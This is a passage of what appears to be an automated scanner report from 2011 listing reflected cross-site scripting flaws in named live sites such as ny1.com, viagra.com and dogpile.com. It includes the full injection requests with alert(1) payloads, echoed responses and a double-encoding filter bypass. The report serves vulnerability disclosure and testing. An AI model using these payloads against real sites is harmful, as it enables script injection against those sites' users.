Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56151
Vary: Accept-Encoding
Cache-Control: public, max-age=562
Expires: Fri, 01 Apr 2011 18:20:02 GMT
Date: Fri, 01 Apr 2011 18:10:40 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeContent.aspxf48c2';6f5ee646a27/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.104. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ny1.com
Path:	/Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b61d'%3b29e3180e9f2 was submitted in the REST URL parameter 1. This input was echoed as 9b61d';29e3180e9f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content9b61d'%3b29e3180e9f2/ServeResource.aspx?id=687&ticks=1202993762 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1202993762
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56111
Vary: Accept-Encoding
Cache-Control: public, max-age=561
Expires: Fri, 01 Apr 2011 18:20:02 GMT
Date: Fri, 01 Apr 2011 18:10:41 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content9b61d';29e3180e9f2/ServeResource.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.105. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ny1.com
Path:	/Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8609'%3b7b5c8f42fb7 was submitted in the REST URL parameter 2. This input was echoed as d8609';7b5c8f42fb7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeResource.aspxd8609'%3b7b5c8f42fb7?id=687&ticks=1202993762 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1202993762
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56157
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:20:46 GMT
Date: Fri, 01 Apr 2011 18:10:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeResource.aspxd8609';7b5c8f42fb7/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.106. http://www.ny1.com/favicon.ico [80003'-alert(1)-'46fe3f653ad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/favicon.ico

Issue detail

The value of the 80003'-alert(1)-'46fe3f653ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2899d'-alert(1)-'c21f3904534 was submitted in the 80003'-alert(1)-'46fe3f653ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?80003'-alert(1)-'46fe3f653ad=12899d'-alert(1)-'c21f3904534 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:01 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56138
Vary: Accept-Encoding
Cache-Control: public, max-age=590
Expires: Fri, 01 Apr 2011 18:20:55 GMT
Date: Fri, 01 Apr 2011 18:11:05 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/favicon.ico?80003'-alert(1)-'46fe3f653ad=12899d'-alert(1)-'c21f3904534'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.107. http://www.ny1.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ny1.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f09d'%3b2cbc36dd419 was submitted in the REST URL parameter 1. This input was echoed as 2f09d';2cbc36dd419 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico2f09d'%3b2cbc36dd419 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ny1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 15:47:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56403
Vary: Accept-Encoding
Cache-Control: public, max-age=571
Expires: Fri, 01 Apr 2011 15:57:09 GMT
Date: Fri, 01 Apr 2011 15:47:38 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/favicon.ico2f09d';2cbc36dd419/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.108. http://www.ny1.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80003'-alert(1)-'46fe3f653ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?80003'-alert(1)-'46fe3f653ad=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ny1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 15:47:27 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56353
Vary: Accept-Encoding
Cache-Control: public, max-age=592
Expires: Fri, 01 Apr 2011 15:57:21 GMT
Date: Fri, 01 Apr 2011 15:47:29 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/favicon.ico?80003'-alert(1)-'46fe3f653ad=1'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.109. http://www.ottawacitizen.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ottawacitizen.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19e72'%3b535a1938ce9 was submitted in the REST URL parameter 1. This input was echoed as 19e72';535a1938ce9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /19e72'%3b535a1938ce9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ottawacitizen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 15:39:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 15:39:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130661

...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/ccn.com/19e72';535a1938ce9/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=19e72';535a1938ce9;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=93713010?">
...[SNIP]...

2.110. http://www.quickyellow.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.quickyellow.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0f13<script>alert(1)</script>b6b93a36579 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c0f13<script>alert(1)</script>b6b93a36579=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quickyellow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Date: Fri, 01 Apr 2011 16:32:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.quickyellow.com/favicon.ico?c0f13<script>alert(1)</script>b6b93a36579=1
Content-Length: 285
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1><p>You don't have permission to access http://www.quickyellow.com/favicon.ico?c0f13<script>alert(1)</script>b6b93a36579=1
on this server.</p>
...[SNIP]...

2.111. http://www.swiftpage1.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.swiftpage1.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 360a1%253cscript%253ealert%25281%2529%253c%252fscript%253efe66127eeb4 was submitted in the REST URL parameter 1. This input was echoed as 360a1<script>alert(1)</script>fe66127eeb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.ico360a1%253cscript%253ealert%25281%2529%253c%252fscript%253efe66127eeb4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Fri, 01 Apr 2011 17:25:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592

               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico360a1<script>alert(1)</script>fe66127eeb4<br>
...[SNIP]...

2.112. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.swiftpage1.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 644d8<script>alert(1)</script>c65e2d87a48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?644d8<script>alert(1)</script>c65e2d87a48=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Fri, 01 Apr 2011 17:25:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592

               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico?644d8<script>alert(1)</script>c65e2d87a48=1<br>
...[SNIP]...

2.113. http://www.viagra.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.viagra.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebdb6'%3b238a37bb66d was submitted in the REST URL parameter 1. This input was echoed as ebdb6';238a37bb66d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icoebdb6'%3b238a37bb66d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.viagra.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 17076
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 01 Apr 2011 15:49:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>
40
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on the next lines. */
s.pageName='http://www.viagra.com/Redirect.aspx?404;http://www.viagra.com:80/favicon.icoebdb6';238a37bb66d';
s.pageType='errorPage';
s.prop1='page error';
s.prop3='error:404';
s.prop5='';
/* Conversion Variables */
s.campaign='';
s.events='7:pageview';
s.eVar3='error:404';
s.eVar5='';
s.eVar6='';
s.eVar18=
...[SNIP]...

2.114. http://www.viagra.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.viagra.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92bef'-alert(1)-'af112dd110f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?92bef'-alert(1)-'af112dd110f=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.viagra.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 17089
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 01 Apr 2011 15:49:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>
40
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on the next lines. */
s.pageName='http://www.viagra.com/Redirect.aspx?404;http://www.viagra.com:80/favicon.ico?92bef'-alert(1)-'af112dd110f=1';
s.pageType='errorPage';
s.prop1='page error';
s.prop3='error:404';
s.prop5='';
/* Conversion Variables */
s.campaign='';
s.events='7:pageview';
s.eVar3='error:404';
s.eVar5='';
s.eVar6='';
s.eVar1
...[SNIP]...

2.115. http://community.dogpile.com/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.dogpile.com
Path:	/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f6b4"-alert(1)-"d53f37e00db was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: community.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.168f6b4"-alert(1)-"d53f37e00db
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:01 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 17:12:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.8
Set-Cookie: RescueUserProfile=AnonymousId=54FD7D1F4FCE244B9E8E2E6C78C4AD06; expires=Mon, 29-Mar-2021 17:12:13 GMT; path=/; domain=rescue.dogpile.com
Set-Cookie: RescueSession=ActionId=578B1FBDAF35A73DAC17A778A44C4092&SessionId=B63CD17302B6DFC9486F33ED8B8928F7; expires=Fri, 01-Apr-2011 17:32:13 GMT; path=/; domain=rescue.dogpile.com
Last-Modified: Fri, 1 Apr 2011 17:12:13 GMT
Expires: Fri, 1 Apr 2011 17:12:13 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Dogpi
...[SNIP]...
<![CDATA[
   var userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.168f6b4"-alert(1)-"d53f37e00db";
   var clientIP = "173.193.214.243";
   // ]]>
...[SNIP]...

2.116. http://support.dogpile.com/pressroom/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://support.dogpile.com
Path:	/pressroom/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e495"-alert(1)-"9bf1c96b7b6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pressroom/ HTTP/1.1
Host: support.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.163e495"-alert(1)-"9bf1c96b7b6
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:01 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 17:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.8
Set-Cookie: RescueUserProfile=AnonymousId=042912B6EF477475A9F8C372FEAD0737; expires=Mon, 29-Mar-2021 17:12:14 GMT; path=/; domain=rescue.dogpile.com
Set-Cookie: RescueSession=ActionId=54FE83B861E3A963BB99A255C9D1979A&SessionId=E801149D4CBCD3E8143E4A98AE2C088E; expires=Fri, 01-Apr-2011 17:32:14 GMT; path=/; domain=rescue.dogpile.com
Last-Modified: Fri, 1 Apr 2011 17:12:15 GMT
Expires: Fri, 1 Apr 2011 17:12:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Do
...[SNIP]...
<![CDATA[
   var userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.163e495"-alert(1)-"9bf1c96b7b6";
   var clientIP = "173.193.214.243";
   // ]]>
...[SNIP]...

2.117. http://www.blacksingles.com/favicon.ico [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.blacksingles.com
Path:	/favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c01b6"%3balert(1)//507cc18a657 was submitted in the Referer HTTP header. This input was echoed as c01b6";alert(1)//507cc18a657 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blacksingles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=c01b6"%3balert(1)//507cc18a657

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 16:32:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: al-amho=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/
Set-Cookie: al-juso=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/
Set-Cookie: SparkUPS=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/
Set-Cookie: OmnitureSessionCheck=2011-04-01 09:32:37Z; path=/
Set-Cookie: REG091202=REG091202&prm=55020&ScenarioFile=/Applications/Registration/XML/SplashRegistration_9051.xml&ScenarioName=Scenario 22&LAST_COMPLETED_STEP=0&CURRENT_STEP=1&SESSION_ID=29782a70-8f42-4bb3-a5f5-0c42294bfb13&START_STEP_ID=1; expires=Sun, 01-May-2011 16:32:37 GMT; path=/
Set-Cookie: mnc5=sid=29782a70-8f42-4bb3-a5f5-0c42294bfb13; domain=.BlackSingles.com; expires=Sun, 01-Apr-2012 16:32:37 GMT; path=/
Set-Cookie: mnc5_PromotionID=objname=PromotionID&sliding=False&val=66301&days=3&dateExp=4%2f4%2f2011+9%3a32%3a37+AM&hash=gXZmZd7YT%2fuF4ppEcafsAw%3d%3d; domain=.BlackSingles.com; expires=Mon, 04-Apr-2011 16:32:37 GMT; path=/
Set-Cookie: mnc5_Luggage=objname=Luggage&sliding=False&val=%3fhl%3den%26q%3dc01b6%2522%253balert(1)%2f%2f507cc18a657&days=3&dateExp=4%2f4%2f2011+9%3a32%3a37+AM&hash=shTvH9IZSFK0Xxy2wxFwsA%3d%3d; domain=.BlackSingles.com; expires=Mon, 04-Apr-2011 16:32:37 GMT; path=/
Cache-Control: no-store
Content-Type: text/html; charset=utf-8
Content-Length: 72510
Set-Cookie: NSC_wjq_hmpcbm.tqbsl.dpn_80=0e4367143660;expires=Fri, 01-Apr-11 16:44:24 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
